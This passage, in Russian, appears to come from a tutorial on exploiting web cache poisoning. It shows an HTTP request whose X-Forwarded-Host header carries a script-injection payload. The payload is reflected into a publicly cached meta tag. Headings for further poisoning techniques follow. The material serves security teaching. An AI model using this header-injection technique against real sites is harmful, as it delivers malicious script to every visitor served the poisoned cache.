Эксплуатация изъянов дизайна кэша
Использование отравления кэша для доставки XSS
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />Использование Web Cache Poisoning для эксплуатации небезопасного импорта ресурсов
Использование Web Cache Poisoning для эксплуатации уязвимостей обработки cookie
Эксплуатация уязвимостей Web Cache Poisoning с использованием нескольких заголовков
Эксплуатация ответов, раскрывающих лишнюю информацию
Директивы Cache-Control
Заголовок Vary
Эксплуатация DOM-уязвимостей с помощью Web Cache Poisoning
Цепочки уязвимостей Web Cache Poisoning
Last updated